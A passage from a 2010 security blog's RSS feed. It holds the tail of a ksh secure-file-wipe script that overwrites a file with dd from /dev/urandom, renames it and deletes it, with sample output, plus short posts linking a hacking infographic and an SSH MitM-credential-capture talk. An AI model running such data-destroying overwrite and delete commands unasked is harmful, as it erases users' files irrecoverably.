<p><span class="re2">SIZE=</span>$<span class="br0">&#40;</span><span class="kw2">ls</span> -l <span class="re1">$FILE</span> | <span class="kw2">cut</span> -d<span class="st0">&#8216; &#8216;</span> -f5<span class="br0">&#41;</span></p>
<p>print -n <span class="st0">&quot;About to wipe file: $FILE are you sure? <span class="es0">\&quot;</span>N/y<span class="es0">\&quot;</span>: &quot;</span><br />
<span class="kw2">read</span> answer<br />
print <span class="st0">&quot;&quot;</span></p>
<p><span class="kw1">if</span> <span class="br0">&#91;</span><span class="br0">&#91;</span> ! <span class="br0">&#40;</span> <span class="re1">$answer</span> = <span class="st0">&#8216;y&#8217;</span> || <span class="re1">$answer</span> = <span class="st0">&#8216;Y&#8217;</span> <span class="br0">&#41;</span> <span class="br0">&#93;</span><span class="br0">&#93;</span><br />
<span class="kw1">then</span><br />
&nbsp; &nbsp; print <span class="st0">&quot;Command canceled.&quot;</span><br />
&nbsp; &nbsp; <span class="kw3">exit</span> <span class="nu0">0</span><br />
<span class="kw1">fi</span></p>
<p><span class="kw1">while</span> <span class="br0">&#91;</span><span class="br0">&#91;</span> <span class="re1">$COUNT</span> -lt <span class="re1">$PASES</span> <span class="br0">&#93;</span><span class="br0">&#93;</span>;do<br />
&nbsp; &nbsp; <span class="br0">&#40;</span><span class="br0">&#40;</span> COUNT += <span class="nu0">1</span> <span class="br0">&#41;</span><span class="br0">&#41;</span><br />
&nbsp; &nbsp; print <span class="st0">&quot;Pass number: $COUNT&quot;</span><br />
&nbsp; &nbsp; <span class="kw2">dd</span> <span class="re2">if=</span><span class="re1">$RANDEV</span> <span class="re2">of=</span><span class="re1">$FILE</span> <span class="re2">bs=</span><span class="re1">$SIZE</span> <span class="re2">count=</span><span class="nu0">1</span><br />
<span class="kw1">done</span></p>
<p><span class="re2">COUNT=</span><span class="nu0">0</span><br />
<span class="kw3">echo</span> <span class="st0">&quot;Renaming&#8230;&quot;</span></p>
<p><span class="kw1">while</span> <span class="br0">&#91;</span><span class="br0">&#91;</span> <span class="re1">$COUNT</span> -lt <span class="re1">$PASES</span> <span class="br0">&#93;</span><span class="br0">&#93;</span>;do<br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#40;</span><span class="br0">&#40;</span> COUNT += <span class="nu0">1</span> <span class="br0">&#41;</span><span class="br0">&#41;</span><br />
&nbsp; &nbsp; &nbsp; &nbsp; <span class="br0">&#40;</span><span class="br0">&#40;</span> NAME += <span class="st0">&quot;$NAME$COUNT&quot;</span> <span class="br0">&#41;</span><span class="br0">&#41;</span><br />
&nbsp; &nbsp; <span class="kw2">mv</span> -v <span class="re1">$FILE</span> <span class="re1">$NAME</span><br />
&nbsp; &nbsp; <span class="re2">FILE=</span><span class="re1">$NAME</span><br />
<span class="kw1">done</span></p>
<p><span class="kw2">rm</span> -v <span class="re1">$FILE</span><br />
<span class="re2">FILE=</span>$<span class="nu0">1</span><br />
<span class="kw3">echo</span> File: <span class="re1">$FILE</span> deleted.<br />
<span class="kw3">exit</span> <span class="nu0">0</span></div>
<p>The syntax is simple:</p>
<div class="dean_ch" style="white-space: wrap;">
&nbsp; &nbsp; &nbsp; &#8211;.^ &nbsp; &nbsp; &nbsp; <span class="br0">&#40;</span>ch0ks@xipe<span class="br0">&#41;</span>*<span class="br0">&#40;</span><span class="nu0">20</span>:<span class="nu0">38</span>:<span class="nu0">05</span><span class="br0">&#41;</span>*<span class="br0">&#40;</span>~<span class="br0">&#41;</span> &nbsp; &nbsp; &nbsp;^.&#8211;<br />
-=:<span class="br0">&#41;</span>&gt; uncomplicatedwipe.<span class="me1">ksh</span> <br />
Syntax: uncomplicatedwipe.<span class="me1">ksh</span> &lt;file to wipe&gt;</div>
<p>You can follow this commands to test the script:</p>
<div class="dean_ch" style="white-space: wrap;"> hexdump /dev/urandom &gt; foo.<span class="me1">txt</span> <br />
<span class="co2">#after some seconds press CTRL+C </span></div>
<p>Now we wipe the file</p>
<div class="dean_ch" style="white-space: wrap;">
&nbsp; &nbsp; &nbsp; &#8211;.^ &nbsp; &nbsp; &nbsp; <span class="br0">&#40;</span>ch0ks@xipe<span class="br0">&#41;</span>*<span class="br0">&#40;</span><span class="nu0">20</span>:<span class="nu0">36</span>:<span class="nu0">00</span><span class="br0">&#41;</span>*<span class="br0">&#40;</span>tmp<span class="br0">&#41;</span> &nbsp; &nbsp; &nbsp;^.&#8211;<br />
-=:<span class="br0">&#41;</span>&gt; uncomplicatedwipe.<span class="me1">sh</span> foo.<span class="me1">txt</span> <br />
About to wipe file: foo.<span class="me1">txt</span> are you sure? <span class="st0">&quot;N/y&quot;</span>: y</p>
<p>Pass number: <span class="nu0">1</span><br />
<span class="nu0">1</span><span class="nu0">+0</span> records in<br />
<span class="nu0">1</span><span class="nu0">+0</span> records out<br />
<span class="nu0">15477760</span> bytes <span class="br0">&#40;</span><span class="nu0">15</span> MB<span class="br0">&#41;</span> copied, <span class="nu0">4.01637</span> s, <span class="nu0">3.9</span> MB/s<br />
Pass number: <span class="nu0">2</span><br />
<span class="nu0">1</span><span class="nu0">+0</span> records in<br />
<span class="nu0">1</span><span class="nu0">+0</span> records out<br />
<span class="nu0">15477760</span> bytes <span class="br0">&#40;</span><span class="nu0">15</span> MB<span class="br0">&#41;</span> copied, <span class="nu0">3.87637</span> s, <span class="nu0">4.0</span> MB/s<br />
Pass number: <span class="nu0">3</span><br />
<span class="nu0">1</span><span class="nu0">+0</span> records in<br />
<span class="nu0">1</span><span class="nu0">+0</span> records out<br />
<span class="nu0">15477760</span> bytes <span class="br0">&#40;</span><span class="nu0">15</span> MB<span class="br0">&#41;</span> copied, <span class="nu0">5.451</span> s, <span class="nu0">2.8</span> MB/s<br />
Pass number: <span class="nu0">4</span><br />
<span class="nu0">1</span><span class="nu0">+0</span> records in<br />
<span class="nu0">1</span><span class="nu0">+0</span> records out<br />
<span class="nu0">15477760</span> bytes <span class="br0">&#40;</span><span class="nu0">15</span> MB<span class="br0">&#41;</span> copied, <span class="nu0">4.48904</span> s, <span class="nu0">3.4</span> MB/s<br />
Pass number: <span class="nu0">5</span><br />
<span class="nu0">1</span><span class="nu0">+0</span> records in<br />
<span class="nu0">1</span><span class="nu0">+0</span> records out<br />
<span class="nu0">15477760</span> bytes <span class="br0">&#40;</span><span class="nu0">15</span> MB<span class="br0">&#41;</span> copied, <span class="nu0">3.88731</span> s, <span class="nu0">4.0</span> MB/s<br />
Pass number: <span class="nu0">6</span><br />
<span class="nu0">1</span><span class="nu0">+0</span> records in<br />
<span class="nu0">1</span><span class="nu0">+0</span> records out<br />
<span class="nu0">15477760</span> bytes <span class="br0">&#40;</span><span class="nu0">15</span> MB<span class="br0">&#41;</span> copied, <span class="nu0">3.98379</span> s, <span class="nu0">3.9</span> MB/s<br />
Pass number: <span class="nu0">7</span><br />
<span class="nu0">1</span><span class="nu0">+0</span> records in<br />
<span class="nu0">1</span><span class="nu0">+0</span> records out<br />
<span class="nu0">15477760</span> bytes <span class="br0">&#40;</span><span class="nu0">15</span> MB<span class="br0">&#41;</span> copied, <span class="nu0">3.2128</span> s, <span class="nu0">4.8</span> MB/s<br />
Renaming&#8230;<br />
`foo.<span class="me1">txt</span><span class="st0">&#8216; -&gt; `69257&#8242;</span><br />
`<span class="nu0">69257</span><span class="st0">&#8216; -&gt; `761829&#8242;</span><br />
`<span class="nu0">761829</span><span class="st0">&#8216; -&gt; `8380122&#8242;</span><br />
`<span class="nu0">8380122</span><span class="st0">&#8216; -&gt; `92181346&#8242;</span><br />
`<span class="nu0">92181346</span><span class="st0">&#8216; -&gt; `1013994811&#8242;</span><br />
`<span class="nu0">1013994811</span><span class="st0">&#8216; -&gt; `11153942927&#8242;</span><br />
`<span class="nu0">11153942927</span><span class="st0">&#8216; -&gt; `122693372204&#8242;</span><br />
removed `<span class="nu0">122693372204</span><span class="st0">&#8216;<br />
File: foo.txt deleted.</span></div>
<p>In the next release I will make a recursive version for directories and you can visit my <a href="http://hackarandas.com/hacking-projects/">other projects here</a>.</p>
<p><strong>Troubleshoot: </strong> Some Unix systems doesn&#8217;t have /dev/urandom device so you can play with the RANDEV variable to use the one you have.</p>
<p><strong>Update: </strong> Some versions of HPUX doesn&#8217;t have /dev/[u]random so you can use as a desperate alternative the /dev/zero device. I found in a <a href="http://forums11.itrc.hp.com/service/forums/questionanswer.do?threadId=75135">forum</a> that some versions of HPUX doesn&#8217;t have the /dev/zero device so you can create it with this command:</p>
<div class="dean_ch" style="white-space: wrap;">
<span class="re3">#!/bin/sh</span></p>
<p><span class="re3"># major/minor <span class="kw1">for</span> HPUX <span class="nu0">11</span>.X</span><br />
<span class="kw2">mknod</span> /dev/zero c <span class="nu0">3</span> <span class="nu0">4</span><br />
<span class="kw2">chown</span> bin:bin /dev/zero<br />
<span class="kw2">chmod</span> <span class="nu0">666</span> /dev/zero</div>
<p><em>Adrián Puente Z.</em></p>
<p><a href="http://www.technorati.com/tag/hackarandas" rel="tag">hackarandas</a>, <a href="http://www.technorati.com/tag/wipe" rel="tag">wipe</a>, <a href="http://www.technorati.com/tag/Adrian+Puente+Z." rel="tag">Adrian Puente Z.</a>, <a href="http://www.technorati.com/tag/security" rel="tag">security</a>, <a href="http://www.technorati.com/tag/Secure+Delete" rel="tag">Secure Delete</a>, <a href="http://www.technorati.com/tag/unix" rel="tag">unix</a>, <a href="http://www.technorati.com/tag/security" rel="tag">security</a>, <a href="http://www.technorati.com/tag/seguridad" rel="tag">seguridad</a>, <a href="http://www.technorati.com/tag/ksh+code" rel="tag">ksh code</a></p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;linkname=Uncomplicated%20File%20Wipe%20for%20%2ANIX" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F08%2F17%2Funcomplicated-wipe-for-nix%2F&amp;title=Uncomplicated%20File%20Wipe%20for%20%2ANIX" id="wpa2a_10"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/08/17/uncomplicated-wipe-for-nix/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Infographic: A Short Story on Hacking</title>
		<link>http://hackarandas.com/blog/2010/06/25/infographic-a-short-story-on-hacking/</link>
		<comments>http://hackarandas.com/blog/2010/06/25/infographic-a-short-story-on-hacking/#comments</comments>
		<pubDate>Fri, 25 Jun 2010 17:03:11 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Inphographic]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[infographic]]></category>
		<category><![CDATA[onlinemba]]></category>
		<category><![CDATA[seguridad informatica]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=257</guid>
		<description><![CDATA[I found this great infographic about hacking and I thought in sharing it. I hope you found it as interesting as I did. Via: Online MBA Technorati Tags:hackarandas, adrian puente z., infographic, online mba, hackersGenerated By Technorati Tag Generator Adrián Puente Z.]]></description>
			<content:encoded><![CDATA[<p>I found this great infographic about hacking and I thought in sharing it. I hope you found it as interesting as I did.</p>
<p><a href="http://www.onlinemba.com/blog/the-history-of-hacking"><img src="http://www.onlinemba.com/images/hacking.jpg" alt="The History of Hacking" width="500"  border="0" /></a><br />Via: <a href="http://www.onlinemba.com">Online MBA</a></p>
<p><i><font size="1">Technorati Tags:<a href="http://www.technorati.com/tag/hackarandas" rel="tag">hackarandas</a>, <a href="http://www.technorati.com/tag/adrian puente z." rel="tag">adrian puente z.</a>, <a href="http://www.technorati.com/tag/infographic" rel="tag">infographic</a>, <a href="http://www.technorati.com/tag/online mba" rel="tag">online mba</a>, <a href="http://www.technorati.com/tag/hackers" rel="tag">hackers</a></font></i><br /><font size="1">Generated By <a href="http://www.gospelrhys.co.uk/" target="_blank">Technorati Tag Generator</a></font></p>
<p><em><strong>Adrián Puente Z</strong>.</em></p>
<p><a class="a2a_button_slashdot" href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Slashdot" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/slashdot.png" width="16" height="16" alt="Slashdot"/></a><a class="a2a_button_tumblr" href="http://www.addtoany.com/add_to/tumblr?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Tumblr" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/tumblr.png" width="16" height="16" alt="Tumblr"/></a><a class="a2a_button_wordpress" href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="WordPress" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/wordpress.png" width="16" height="16" alt="WordPress"/></a><a class="a2a_button_twitter" href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Twitter" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/twitter.png" width="16" height="16" alt="Twitter"/></a><a class="a2a_button_linkedin" href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="LinkedIn" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/linkedin.png" width="16" height="16" alt="LinkedIn"/></a><a class="a2a_button_google_bookmarks" href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Google Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/google.png" width="16" height="16" alt="Google Bookmarks"/></a><a class="a2a_button_facebook" href="http://www.addtoany.com/add_to/facebook?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Facebook" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/facebook.png" width="16" height="16" alt="Facebook"/></a><a class="a2a_button_google_reader" href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Google Reader" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/reader.png" width="16" height="16" alt="Google Reader"/></a><a class="a2a_button_digg" href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Digg" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/digg.png" width="16" height="16" alt="Digg"/></a><a class="a2a_button_meneame" href="http://www.addtoany.com/add_to/meneame?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Meneame" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/meneame.png" width="16" height="16" alt="Meneame"/></a><a class="a2a_button_technorati_favorites" href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Technorati Favorites" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/technorati.png" width="16" height="16" alt="Technorati Favorites"/></a><a class="a2a_button_stumbleupon" href="http://www.addtoany.com/add_to/stumbleupon?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="StumbleUpon" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/stumbleupon.png" width="16" height="16" alt="StumbleUpon"/></a><a class="a2a_button_blogger_post" href="http://www.addtoany.com/add_to/blogger_post?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Blogger Post" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/blogger.png" width="16" height="16" alt="Blogger Post"/></a><a class="a2a_button_yahoo_bookmarks" href="http://www.addtoany.com/add_to/yahoo_bookmarks?linkurl=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;linkname=Infographic%3A%20A%20Short%20Story%20on%20Hacking" title="Yahoo Bookmarks" rel="nofollow" target="_blank"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/icons/yahoo.png" width="16" height="16" alt="Yahoo Bookmarks"/></a><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fhackarandas.com%2Fblog%2F2010%2F06%2F25%2Finfographic-a-short-story-on-hacking%2F&amp;title=Infographic%3A%20A%20Short%20Story%20on%20Hacking" id="wpa2a_12"><img src="http://hackarandas.com/blog/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://hackarandas.com/blog/2010/06/25/infographic-a-short-story-on-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SSH Hacking and Good Practices</title>
		<link>http://hackarandas.com/blog/2010/06/11/ssh-hacking-and-good-practices/</link>
		<comments>http://hackarandas.com/blog/2010/06/11/ssh-hacking-and-good-practices/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 15:00:20 +0000</pubDate>
		<dc:creator>Ch0ks</dc:creator>
				<category><![CDATA[Artículos]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Presentaciones]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Adrian Puente Z.]]></category>
		<category><![CDATA[Best Practices]]></category>
		<category><![CDATA[hackarandas]]></category>
		<category><![CDATA[Pauldotcom]]></category>
		<category><![CDATA[SSH]]></category>

		<guid isPermaLink="false">http://hackarandas.com/blog/?p=235</guid>
		<description><![CDATA[I got to confess that I am a big podcast fan and one I am fond of is PaulDotCom &#8211; Security Weekly (I also hear it while I am jogging) So when I read in the blog the Mark Baggett&#8217;s post: Capturing SSH V1 &#038; V2 Credentials with a MitM ssh honeypot I just feel [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://hackarandas.com/blog/wp-content/uploads/2010/06/ssh.jpg"><img src="http://hackarandas.com/blog/wp-content/uploads/2010/06/ssh.jpg" alt="" title="ssh" width="132" height="208" style="margin: 10px 10px 0pt 0pt; float: left;" /></a>  I got to confess that I am a big podcast fan and one I am fond of is <a href="http://www.pauldotcom.com/security-weekly/">PaulDotCom &#8211; Security Weekly</a> (I also hear it while I am jogging) So when I read in the blog the Mark Baggett&#8217;s post: <a href="http://pauldotcom.com/2010/04/capturing-ssh-v1-v2-credential.html">Capturing SSH V1 &#038; V2 Credentials with a MitM ssh honeypot</a> I just feel like &#8220;I have to try it&#8221;. So I did and wrote this presentation for Sm4rt Security Services&#8217; Tech Day, but I wanted to go further so I wrote it in a way that can be useful for the Pentesters and the Information Security Officers in the company.</p>
<p>In the first part I talk about some basic concepts about SSH then I got for the hacking part so I give a demonstration based on the Mark Baggett&#8217;s post and I finish giving come SSH security tips based on my experience and some articles I found on Internet. I hope you found it interesting.</p>
<p>You can download it from here:</p>
<p><strong><a href="http://hackarandas.com/security-articles/SSH.Hacking.and.Good.Practices-Adrian.Puente.Z.pdf">SSH Hacking and Good.Practices</a></strong> by <strong>Adrian Puente Z.</strong> (PDF Presentation)</p>
<p>Please visit my other <a href="http://hackarandas.com/hacking-projects/">Hacking Projects</a> o <a href="http://hackarandas.com/security-articles/">Security Articles</a>.</p>
<p>If you have something valuable to add to this presentation, please leave your comment.</p>
<p>References:</p>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Secure_Shell">Secure Shell from Wikipedia, the free encyclopedia</a></li>
<li><a href="http://www.redhat.com/docs/manuals/linux/RHL-9-Manual/ref-guide/s1-ssh-conn.html">Red Hat Linux 9: Red Hat Linux Reference Guide, Chapter 18. SSH Protocol</a> </li>
<li><a href="http://pauldotcom.com/2010/04/capturing-ssh-v1-v2-credential.html">Capturing SSH V1 &#038; V2 Credentials with a MitM ssh honeypot by Mark Baggett</a></li>
<li><a href="http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html">Top 20 OpenSSH Server Best Security Practices</a></li>
<li><a href="http://www.howtoforge.com/ssh_key_based_logins_putty">Key-Based SSH Logins With PuTTY</a></li>
</ul>
<p>Adrián Puente Z.</p>
<p>Technorati Tags:<br />
<a href="http://technorati.com/tag/Adrian+Puente+Z." rel="tag">Adrian Puente Z.</a> <a href="http://technorati.com/tag/hackarandas" rel="tag">hackarandas</a> <a href="http://technorati.com/tag/SSH" rel="tag">SSH</a> <a href="http://technorati.com/tag/hacking" rel="tag">hacking</a> <a href="http://technorati.com/tag/Man+in+the+Middle" rel="tag">Man in the Middle</a> <a href="http://technorati.com/tag/Best+Practices" rel="tag">Best Practices</a> <a href="http://technorati.com/tag/Security" rel="tag">Security</a></p>
